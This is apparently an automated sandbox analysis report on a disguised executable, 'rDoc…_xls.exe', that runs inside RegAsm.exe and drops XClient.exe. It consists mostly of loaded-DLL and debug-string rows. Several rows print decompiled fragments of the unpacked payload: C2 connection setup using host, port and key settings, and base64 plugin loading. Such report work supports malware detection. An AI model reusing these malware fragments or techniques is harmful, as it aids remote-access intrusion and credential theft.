Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: sxs.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: scrrun.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: linkinfo.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: ntshrui.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: cscapi.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: avicap32.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: msvfw32.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: winmm.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: dpapi.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: vaultcli.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: |
Binary string: C:\Windows\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: RegAsm.exe, 00000002.00000002.2653222752.0000000001215000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Data.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbeTOT source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BC0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: RegAsm.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2659308931.0000000005BB0000.00000004.00000020.00020000.00000000.sdmp, XClient.exe.2.dr |
Source: |
Binary string: mscorlib.pdbq source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.Xml.ni.pdbRSDS# source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: Microsoft.VisualBasic.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Core.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Numerics.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: HSDSDF32.pdbh source: rDoc5633276235623657_xls.exe |
Source: |
Binary string: System.Transactions.ni.pdbRSDSc source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdbH source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Management.ni.pdbRSDSJ< source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: mscorlib.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: \??\C:\Windows\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BB0000.00000004.00000020.00020000.00000000.sdmp, XClient.exe.2.dr |
Source: |
Binary string: \??\C:\Windows\RegAsm.pdbp( source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Configuration.pdb8< source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Configuration.ni.pdbRSDScUN source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.Runtime.Serialization.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: \??\C:\Windows\RegAsm.pdb0(G source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Xml.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: mscorlib.pdbL} source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.ni.pdbRSDS source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: mscorlib.pdb< source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: Microsoft.VisualBasic.pdbRSDSc source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: HSDSDF32.pdb source: rDoc5633276235623657_xls.exe |
Source: |
Binary string: C:\Windows\RegAsm.pdbpdbAsm.pdb source: RegAsm.exe, 00000002.00000002.2653222752.0000000001215000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: n0C:\Windows\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.Configuration.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BC0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BC0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: mscorlib.ni.pdbRSDS source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: \??\C:\Windows\exe\RegAsm.pdba source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Data.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Configuration.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Xml.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: o.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Numerics.ni.pdbRSDSautg source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: %%.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.Windows.Forms.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BB0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp, WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdbhk@ source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Drawing.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Management.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Xml.pdb@DHLPhl source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Data.ni.pdbRSDS source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Management.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Core.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Transactions.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: \??\C:\Windows\exe\RegAsm.pdbE source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: symbols\dll\mscorlib.pdbLb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.Runtime.Serialization.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Core.pdbxm. source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Transactions.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: mscorlib.pdb246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: RegAsm.exe, 00000002.00000002.2653222752.0000000001215000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Numerics.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Windows.Forms.pdbDN. source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Data.pdb, source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Core.ni.pdbRSDS source: WER8A2C.tmp.dmp.9.dr |
Source: rDoc5633276235623657_xls.exe, DyyVDbaRvM1YfIq9il.cs |
.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.bTWUCGjumGB3L(16777255)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.bTWUCGjumGB3L(16777256)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.bTWUCGjumGB3L(16777253))}) |
Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
